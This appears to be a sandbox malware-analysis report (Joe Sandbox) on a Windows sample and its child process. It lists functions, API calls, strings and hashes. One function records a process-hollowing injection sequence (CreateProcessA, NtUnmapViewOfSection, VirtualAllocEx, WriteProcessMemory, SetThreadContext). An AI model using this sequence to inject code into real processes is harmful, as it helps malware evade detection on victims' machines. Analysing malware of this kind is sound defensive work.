Instruction ID: 266b505f4b4a70e0031bd9b61304a7f29979de1156be46298b6644775383f0d6
Opcode Fuzzy Hash: 01a20a6393f6cf1e01e81d8ef9af866549bd590d312b5bd55c7394e971cc1238
Instruction Fuzzy Hash: 70F0B4B2B04201AFDB00EBA19E49AAF36589B40348F14443BB142F50C2D6BC4941AB6D

Uniqueness

Uniqueness Score: -1.00%

Function 004034C0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?,"C:\Users\user\Desktop\Hu25VEa8Dr.exe",00000000,00000000,00403498,004032EB,00000000), ref: 004034DA
GlobalFree.KERNEL32(?), ref: 004034E1

Strings

"C:\Users\user\Desktop\Hu25VEa8Dr.exe", xrefs: 004034D2

Memory Dump Source

Source File: 00000000.00000002.341136687.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.341120489.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341168948.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341177429.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341177429.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341177429.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341177429.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341177429.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341265956.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Hu25VEa8Dr.jbxd

Similarity

API ID: Free$GlobalLibrary
String ID: "C:\Users\user\Desktop\Hu25VEa8Dr.exe"
API String ID: 1100898210-618081267
Opcode ID: 46acf84ebda6383aa3704241e203cd439e3c816428f1e63aa7a51627b246d5e2
Instruction ID: a7ab284cabc648ba81e11ba063b903b3b671d5f7e61a69f5101281db245b6d62
Opcode Fuzzy Hash: 46acf84ebda6383aa3704241e203cd439e3c816428f1e63aa7a51627b246d5e2
Instruction Fuzzy Hash: E1E08C329110209BD6221F05AE0575A7B6D6B44B32F02802AE9407B2A087746C424BDD

Uniqueness

Uniqueness Score: -1.00%

Function 00405546 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(80000000,C:\Users\user\Desktop,00402C8E,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Hu25VEa8Dr.exe,C:\Users\user\Desktop\Hu25VEa8Dr.exe,80000000,00000003), ref: 0040554C
CharPrevA.USER32(80000000,00000000), ref: 0040555A

Strings

C:\Users\user\Desktop, xrefs: 00405546

Memory Dump Source

Source File: 00000000.00000002.341136687.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.341120489.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341168948.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341177429.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341177429.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341177429.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341177429.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341177429.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341265956.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Hu25VEa8Dr.jbxd

Similarity

API ID: CharPrevlstrlen
String ID: C:\Users\user\Desktop
API String ID: 2709904686-66916594
Opcode ID: 49376fbf8c9c30057c1bc985cc011eea510fd351d3a644e674ee9e82abf7fe19
Instruction ID: fca702df0190f5d4796b13fce4c8f5ccfdab60c3fa8ed772e71c257c4247ae30
Opcode Fuzzy Hash: 49376fbf8c9c30057c1bc985cc011eea510fd351d3a644e674ee9e82abf7fe19
Instruction Fuzzy Hash: 39D0A772508EB07EE70366149C00B9F7A88CF13340F094462E040A61D4C27C4D418FFD

Uniqueness

Uniqueness Score: -1.00%

Function 00405658 Relevance: 5.0, APIs: 4, Instructions: 30stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(00000000,?,00000000,00000000,00405866,00000000,[Rename],?,?,00000000,000000F1,?), ref: 0040565F
lstrcmpiA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000,00405866,00000000,[Rename],?,?,00000000,000000F1,?), ref: 00405678
CharNextA.USER32(00000000), ref: 00405686
lstrlenA.KERNEL32(00000000,00000000,?,00000000,00000000,00405866,00000000,[Rename],?,?,00000000,000000F1,?), ref: 0040568F

Memory Dump Source

Source File: 00000000.00000002.341136687.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.341120489.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341168948.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341177429.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341177429.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341177429.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341177429.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341177429.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341265956.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Hu25VEa8Dr.jbxd

Similarity

API ID: lstrlen$CharNextlstrcmpi
String ID:
API String ID: 190613189-0
Opcode ID: 0108cf067d6f6d80c8ed850288af8a4b3b9133f156f8bdff26d83f0dd252fb59
Instruction ID: fee4d645b7b415a6dc1afaac75e8b1817c7eae67fc86a6e8a33b60f3285d70db
Opcode Fuzzy Hash: 0108cf067d6f6d80c8ed850288af8a4b3b9133f156f8bdff26d83f0dd252fb59
Instruction Fuzzy Hash: 05F0A736309D519AC2125B295C04A6F6A98EF91314B58097AF444F2140E33A9C119BBF

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: Sahofivizu.exePID: 920, Parent PID: 2948COMMON

Execution Graph

Execution Coverage:	13.8%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	5.9%
Total number of Nodes:	303
Total number of Limit Nodes:	7

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 004012F0 Relevance: 36.9, APIs: 15, Strings: 6, Instructions: 189
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

??2@YAPAXI@Z.MSVCRT ref: 004012FB
GetCapture.USER32 ref: 0040130F
GetMenu.USER32 ref: 00401316
GetMenuItemInfoA.USER32 ref: 0040131D

Part of subcall function 004015D8: free.MSVCRT(00401332,00401332,00000000), ref: 004015DC

malloc.MSVCRT ref: 0040133E
GetSystemInfo.KERNELBASE(00000000), ref: 0040134D
xupetipe.GOZEKENEKA(?), ref: 004013D1
_ftol.MSVCRT ref: 004013EA
Negefibizoh.XUXOKUXOKA(0040328C,004042C0,?), ref: 0040145A
fread.MSVCRT ref: 00401478
fclose.MSVCRT ref: 0040147F
CreateHatchBrush.GDI32(00000005,00000000), ref: 00401491
??2@YAPAXI@Z.MSVCRT ref: 0040149C
Fetomekiratu.ZOJEMILOCAN(00000000,?,00000004,?,01E00048,?,?,?), ref: 004014BD
bedevahetay.NATIGEZEHOLI(01E00048,?,01E00048,?,?,?), ref: 0040150C

Part of subcall function 004011F0: ReadConsoleInputW.KERNEL32(?,?,00000001,00000000), ref: 00401202

Strings

H0@, xrefs: 004013AD, 004013B6
`0@, xrefs: 00401372
T0@, xrefs: 0040137F
P, xrefs: 004014D3
LDs, xrefs: 0040137A
D0@, xrefs: 0040138F

Memory Dump Source

Source File: 00000002.00000002.349512027.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.349509506.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.349514776.0000000000402000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.349517219.0000000000403000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.349519601.0000000000405000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Sahofivizu.jbxd

Similarity

API ID: ??2@InfoMenu$BrushCaptureConsoleCreateFetomekiratuHatchInputItemNegefibizohReadSystem_ftolbedevahetayfclosefreadfreemallocxupetipe
String ID: D0@$H0@$LDs$P$T0@$`0@
API String ID: 2075003006-1845043185
Opcode ID: 53cd896a6e9f52e95d25f5558639e1f3db188788eb616e60ca084bd420d84f84
Instruction ID: 7e94330157edeea2d52b545d952624ab7b3320839cf697c0ec5b1c23d0548237
Opcode Fuzzy Hash: 53cd896a6e9f52e95d25f5558639e1f3db188788eb616e60ca084bd420d84f84
Instruction Fuzzy Hash: D271A2B0508340ABE310DF64EE49B5B7FD8AB85309F04457EF685772E1D7B98608CB6A

Uniqueness

Uniqueness Score: -1.00%

Function 10001000 Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 223
libraryinjectionprocessCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNEL32(?), ref: 10001044

Part of subcall function 10001303: GetProcAddress.KERNEL32(?,?,?,00000000,100051F0,10005274,10001058,00000000,100051F0), ref: 1000131E
Part of subcall function 10001303: GetProcAddress.KERNEL32(?,?), ref: 1000134B
Part of subcall function 10001303: LoadLibraryA.KERNEL32(?,?), ref: 10001367

GetCommandLineA.KERNEL32(00000000,100051F0), ref: 10001058
PathGetArgsA.SHLWAPI(00000000), ref: 1000107C
RtlZeroMemory.NTDLL(10005210,00000044), ref: 100010A9
LoadLibraryA.KERNEL32(01DFFF6D), ref: 100010E6
CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000024,00000000,00000000,10005210,10005534), ref: 10001130
NtUnmapViewOfSection.NTDLL(00000068,?), ref: 10001146
VirtualAllocEx.KERNEL32(00000068,?,?,00003000,00000040), ref: 100011D0
WriteProcessMemory.KERNEL32(00000068,?,?,?,00000000), ref: 100011F4
SetThreadContext.KERNEL32(00000064,10005274), ref: 100012E7

Strings

(, xrefs: 10001262

Memory Dump Source

Source File: 00000002.00000002.349531459.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.349529168.0000000010000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.349533983.0000000010004000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.349536461.0000000010005000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.349539416.0000000010006000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_Sahofivizu.jbxd

Similarity

API ID: LibraryLoad$AddressMemoryProcProcess$AllocArgsCommandContextCreateLinePathSectionThreadUnmapViewVirtualWriteZero
String ID: (
API String ID: 2364053360-3887548279
Opcode ID: 037b24e94ce7eda0725ae1a1775957593b6f77e50722cac3224d5c9ff137c321
Instruction ID: 3686c257d1733d8f280bccd01df7fd3f1935d524a4d0ec349a118272831d3a8f
Opcode Fuzzy Hash: 037b24e94ce7eda0725ae1a1775957593b6f77e50722cac3224d5c9ff137c321
Instruction Fuzzy Hash: 6CA1B074601225DFE704CF58CCD8E667BA5FF4E38A78541A9E5068B376C732A812CF54

Uniqueness

Uniqueness Score: -1.00%

Function 00401636 Relevance: 16.6, APIs: 11, Instructions: 111
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__set_app_type.MSVCRT ref: 00401663
__p__fmode.MSVCRT ref: 00401678
__p__commode.MSVCRT ref: 00401686
__setusermatherr.MSVCRT ref: 004016B2
_initterm.MSVCRT ref: 004016C8
__getmainargs.MSVCRT ref: 004016EB
_initterm.MSVCRT ref: 004016FB
GetStartupInfoA.KERNEL32 ref: 0040173A
GetModuleHandleA.KERNEL32(00000000,00000000,?,0000000A), ref: 0040175E
exit.MSVCRT ref: 0040176E
_XcptFilter.MSVCRT ref: 00401780

Memory Dump Source

Source File: 00000002.00000002.349512027.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.349509506.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.349514776.0000000000402000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.349517219.0000000000403000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.349519601.0000000000405000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Sahofivizu.jbxd

Similarity

API ID: _initterm$FilterHandleInfoModuleStartupXcpt__getmainargs__p__commode__p__fmode__set_app_type__setusermatherrexit
String ID:
API String ID: 801014965-0
Opcode ID: f92d71296a11253ec965f9cb296b5f0c4059aa583f2d3de2ab08ccf73150820a
Instruction ID: 59e29d7587bae7e9570ce306a69a77950e06f0e43c92f3a1b352005f67b7f482
Opcode Fuzzy Hash: f92d71296a11253ec965f9cb296b5f0c4059aa583f2d3de2ab08ccf73150820a
Instruction Fuzzy Hash: 61416DB5900344AFDB209FA4DE49AAA7BB8FB49750F20057FF641B72E1D7784841CB18

Uniqueness

Uniqueness Score: -1.00%

Function 001B1000 Relevance: 10.5, APIs: 7, Instructions: 46
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

fopen.MSVCRT ref: 001B100A
fseek.MSVCRT ref: 001B1029
ftell.MSVCRT ref: 001B1031
fseek.MSVCRT ref: 001B1048
??2@YAPAXI@Z.MSVCRT ref: 001B104D
mblen.MSVCRT ref: 001B1071
malloc.MSVCRT ref: 001B107D

Memory Dump Source

Source File: 00000002.00000002.349490851.00000000001B1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000002.00000002.349488449.00000000001B0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.349493345.00000000001B2000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.349495824.00000000001B4000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1b0000_Sahofivizu.jbxd

Similarity

API ID: fseek$??2@fopenftellmallocmblen
String ID:
API String ID: 1956454988-0
Opcode ID: 378978aa552441da6b16bbd157b677f00902b07f63dfa66006d0b4d630a190ab
Instruction ID: 6987e4b794b39228d20832f65b84a5d905d6c2ea9f9323fa1c1492d26464bec0
Opcode Fuzzy Hash: 378978aa552441da6b16bbd157b677f00902b07f63dfa66006d0b4d630a190ab
Instruction Fuzzy Hash: C8010871644241ABD710BB65EC85B4737B8AF8C741F100655F518D7650D774A6A8CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 1000165A Relevance: 7.5, APIs: 5, Instructions: 38
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualFree.KERNELBASE(01DF0584,00100000,00004000,?,?,?,?,10001448,1000148E,?,?,?), ref: 10001688
VirtualFree.KERNELBASE(01DF0584,00000000,00008000,?,?,10001448,1000148E,?,?,?), ref: 10001693
HeapFree.KERNEL32(00000000,?), ref: 100016A0
HeapFree.KERNEL32(00000000,?,?), ref: 100016BE
HeapDestroy.KERNELBASE(?,?,10001448,1000148E,?,?,?), ref: 100016C6

Memory Dump Source

Source File: 00000002.00000002.349531459.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.349529168.0000000010000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.349533983.0000000010004000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.349536461.0000000010005000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.349539416.0000000010006000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_Sahofivizu.jbxd

Similarity

API ID: Free$Heap$Virtual$Destroy
String ID:
API String ID: 782257640-0
Opcode ID: 16c968df11c80f4839faa5dd0be9cb8f858190d9a875e5543b79e2ab491c8c70
Instruction ID: 61a0c7697adea93b5fe945f8e2afc69d7dd1263472ae5ce1153fbc6210c6796e
Opcode Fuzzy Hash: 16c968df11c80f4839faa5dd0be9cb8f858190d9a875e5543b79e2ab491c8c70
Instruction Fuzzy Hash: 0FF06D36240225EFFA229F51CDCAF47BB61E7487E2F264020F340260B8CA737820DB18

Uniqueness

Uniqueness Score: -1.00%

Function 100024FE Relevance: 6.1, APIs: 4, Instructions: 53
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

HeapReAlloc.KERNEL32(00000000,00000060,00000000,00000000,100022C6,00000000,00000001,00000000), ref: 10002526
RtlAllocateHeap.NTDLL(00000008,000041C4,00000000,00000000,100022C6,00000000,00000001,00000000), ref: 1000255A
VirtualAlloc.KERNELBASE(00000000,00100000,00002000,00000004), ref: 10002574
HeapFree.KERNEL32(00000000,?), ref: 1000258B

Memory Dump Source

Source File: 00000002.00000002.349531459.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.349529168.0000000010000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.349533983.0000000010004000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.349536461.0000000010005000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.349539416.0000000010006000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_Sahofivizu.jbxd

Similarity

API ID: Heap$Alloc$AllocateFreeVirtual
String ID:
API String ID: 1005975451-0
Opcode ID: dbe84276b22d936fcf28fe8366a40f9be5e16de133823684676681efb08bdf82
Instruction ID: 8c717063115672bf0fc247caff50c072d0a3175c7713bb39a850b630715b60b1
Opcode Fuzzy Hash: dbe84276b22d936fcf28fe8366a40f9be5e16de133823684676681efb08bdf82
Instruction Fuzzy Hash: 03116A70200B62DFE721CF19CCC59177BB5FB893E27214619E266D61B8E7729895CF04

Uniqueness

Uniqueness Score: -1.00%

Function 10001303 Relevance: 4.6, APIs: 3, Instructions: 56
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcAddress.KERNEL32(?,?,?,00000000,100051F0,10005274,10001058,00000000,100051F0), ref: 1000131E
GetProcAddress.KERNEL32(?,?), ref: 1000134B
LoadLibraryA.KERNEL32(?,?), ref: 10001367

Memory Dump Source

Source File: 00000002.00000002.349531459.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.349529168.0000000010000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.349533983.0000000010004000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.349536461.0000000010005000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.349539416.0000000010006000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_Sahofivizu.jbxd

Similarity

API ID: AddressProc$LibraryLoad
String ID:
API String ID: 2238633743-0
Opcode ID: a2a4460d8b42876672ffae12abd207b6d653eef4aa71be30f549fe1d26958614
Instruction ID: 6b4b563568a0099a7d313ee5757a75211569dd7bb91b6627a7ee3c4013f845ab
Opcode Fuzzy Hash: a2a4460d8b42876672ffae12abd207b6d653eef4aa71be30f549fe1d26958614
Instruction Fuzzy Hash: 7611E675200105EFD714CF28C894EA5BBE9FF58358B24846DEA59DB361CB32AD51CB90

Uniqueness

Uniqueness Score: -1.00%

Function 1000161E Relevance: 3.0, APIs: 2, Instructions: 20
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

HeapCreate.KERNELBASE(00000000,00001000,00000000,100013AF,00000000), ref: 1000162F

Part of subcall function 10001E61: HeapAlloc.KERNEL32(00000000,00000140,10001643), ref: 10001E6E

HeapDestroy.KERNEL32 ref: 1000164D

Memory Dump Source

Source File: 00000002.00000002.349531459.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.349529168.0000000010000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.349533983.0000000010004000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.349536461.0000000010005000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.349539416.0000000010006000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_Sahofivizu.jbxd

Similarity

API ID: Heap$AllocCreateDestroy
String ID:
API String ID: 2236781399-0
Opcode ID: f0ff528cfb4eee2c5d7f4ce2a576517689442160b2c3fce08d867651e9050fc8
Instruction ID: b44736f6baa83e7d6a93fb0d53bb776c116ce931ecf9813d38e3291ce07d1fa6
Opcode Fuzzy Hash: f0ff528cfb4eee2c5d7f4ce2a576517689442160b2c3fce08d867651e9050fc8
Instruction Fuzzy Hash: 9EE012707543119EFF504B308DC979636D5EB487C3F098425FA01C81BCEB71C540E615

Uniqueness

Uniqueness Score: -1.00%

Function 004015E3 Relevance: 3.0, APIs: 2, Instructions: 12
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_onexit.MSVCRT ref: 004015F0
__dllonexit.MSVCRT ref: 00401606

Memory Dump Source

Source File: 00000002.00000002.349512027.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.349509506.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.349514776.0000000000402000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.349517219.0000000000403000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.349519601.0000000000405000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Sahofivizu.jbxd

Similarity

API ID: __dllonexit_onexit
String ID:
API String ID: 2384194067-0
Opcode ID: bdaf2b64863544c3b2515e46637725f58fd199791387d0c07701695bbfc004bc
Instruction ID: ca292e61e73f955b3a7a16f36ff4d915cd86340734f0e01b9fbe6593226695e0
Opcode Fuzzy Hash: bdaf2b64863544c3b2515e46637725f58fd199791387d0c07701695bbfc004bc
Instruction Fuzzy Hash: ABC012B4640310BBCA045721BE0A9553721A7D07B2B6047BEF265300F097B90A25F50D

Uniqueness

Uniqueness Score: -1.00%

Function 100025AF Relevance: 1.3, APIs: 1, Instructions: 85
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(?,00008000,00001000,00000004,00000000,00000000,000000E0,-000000C9,?,100022D5,000000E0,00000000,00000001,00000000), ref: 10002600

Memory Dump Source

Source File: 00000002.00000002.349531459.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.349529168.0000000010000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.349533983.0000000010004000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.349536461.0000000010005000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.349539416.0000000010006000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_Sahofivizu.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: c024661bb34bb728b433060c083a65a30a491f3d0f3aa2d51cacd4275a428c02
Instruction ID: e8023bc93e902970d527dcdc1609af902be182bd13007913b083f88dc202a63d
Opcode Fuzzy Hash: c024661bb34bb728b433060c083a65a30a491f3d0f3aa2d51cacd4275a428c02
Instruction Fuzzy Hash: DC31BE716016069FE314CF18C894BA5FBE4FF443A8F25C2BDE5598B2A2D771E946CB40

Uniqueness

Uniqueness Score: -1.00%

Function 100026E8 Relevance: 1.3, APIs: 1, Instructions: 21
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

HeapAlloc.KERNEL32(00000000,-0000000E,00000000,100026CC,000000E0,100026B9,00000001,10001CAB,00000001,?,?,?,?,?,?,100013F6), ref: 10002716

Memory Dump Source

Source File: 00000002.00000002.349531459.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.349529168.0000000010000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.349533983.0000000010004000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.349536461.0000000010005000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.349539416.0000000010006000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_Sahofivizu.jbxd

Similarity

API ID: AllocHeap
String ID:
API String ID: 4292702814-0
Opcode ID: 05a360d2f0b3347189bce5f08380c6bcd7cef7050c63d3436c765e236448abe3
Instruction ID: 323c970e6e0f283b15a3e7abaa1b36c9a8ccdf6e68953bacb870ff952791e141
Opcode Fuzzy Hash: 05a360d2f0b3347189bce5f08380c6bcd7cef7050c63d3436c765e236448abe3
Instruction Fuzzy Hash: 37E08C32949531A6F511A318ACC07CB3754EB052F1F170111FD587A0ECC7212C4045C4

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00021000 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 69
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

malloc.MSVCRT ref: 00021007
wsprintfA.USER32 ref: 00021030
__allrem.LIBCMT ref: 0002108A
wsprintfA.USER32 ref: 000210C1
_fullpath.MSVCRT ref: 000210DD

Strings

dfdfadf.tmp, xrefs: 000210D3
C:\Users\user\AppData\Local\Temp\dfdfadf.tmp, xrefs: 000210D8
%sI%d4%s, xrefs: 0002102A

Memory Dump Source

Source File: 00000002.00000002.349465636.0000000000021000.00000020.00000001.01000000.00000007.sdmp, Offset: 00020000, based on PE: true

Associated: 00000002.00000002.349463065.0000000000020000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.349468068.0000000000022000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.349470440.0000000000023000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.349472776.0000000000024000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_20000_Sahofivizu.jbxd

Similarity

API ID: wsprintf$__allrem_fullpathmalloc
String ID: %sI%d4%s$C:\Users\user\AppData\Local\Temp\dfdfadf.tmp$dfdfadf.tmp
API String ID: 475258233-3781896646
Opcode ID: e81a1d83c9d12b52c22b9a004a07bebc555f53a1c847616e3a44fbb79a1cc2de
Instruction ID: e90cff05450bf6b2fe46e5ed2c1245e098adab761f0d4a44b46e96c27f180eb9
Opcode Fuzzy Hash: e81a1d83c9d12b52c22b9a004a07bebc555f53a1c847616e3a44fbb79a1cc2de
Instruction Fuzzy Hash: 6421AF76E40260ABF3309B54BCE5F9377A8F758750B240016FF0496261D2BE9B52DBB4

Uniqueness

Uniqueness Score: -1.00%

Function 10002FD5 Relevance: 14.0, APIs: 4, Strings: 4, Instructions: 50
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNEL32(user32.dll), ref: 10002FE7
GetProcAddress.KERNEL32(00000000,MessageBoxA), ref: 10002FFF
GetProcAddress.KERNEL32(00000000,GetActiveWindow), ref: 10003010
GetProcAddress.KERNEL32(00000000,GetLastActivePopup), ref: 1000301D

Strings

user32.dll, xrefs: 10002FE2
GetLastActivePopup, xrefs: 10003012
GetActiveWindow, xrefs: 1000300A
MessageBoxA, xrefs: 10002FF9

Memory Dump Source

Source File: 00000002.00000002.349531459.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.349529168.0000000010000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.349533983.0000000010004000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.349536461.0000000010005000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.349539416.0000000010006000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_Sahofivizu.jbxd

Similarity

API ID: AddressProc$LibraryLoad
String ID: GetActiveWindow$GetLastActivePopup$MessageBoxA$user32.dll
